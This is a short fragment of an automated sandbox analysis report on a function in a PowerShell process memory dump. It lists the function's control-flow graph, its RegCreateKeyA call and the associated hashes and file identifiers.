                                      control_flow_graph 688 2dc007f41b0-2dc007f41d1 689 2dc007f41d3-2dc007f41de RegCreateKeyA 688->689 690 2dc007f41e0-2dc007f41e6 688->690 691 2dc007f41eb-2dc007f41f1 689->691 690->691 693 2dc007f41f3-2dc007f4226 call 2dc007f9fa8 691->693 694 2dc007f4230-2dc007f4242 691->694 693->694 698 2dc007f4228-2dc007f422e 693->698 698->694
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000014.00000002.766683570.000002DC007F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002DC007F0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_20_2_2dc007f0000_powershell.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 57141b6d7e82af90fc252f8a6aff855dd69fc072bb2936abf4c2cedabf69c664
                                      • Instruction ID: 097966f7f1f7e7a8403cbeaa38655d6cc97e807566f797c6414231572198ad21
                                      • Opcode Fuzzy Hash: 57141b6d7e82af90fc252f8a6aff855dd69fc072bb2936abf4c2cedabf69c664
                                      • Instruction Fuzzy Hash: 4111C830718A598FDB58DB5CD44872AB7E5FBA8351F21042EE84DC32A0DA74CD41CB42
                                      Uniqueness

                                      Uniqueness Score: -1.00%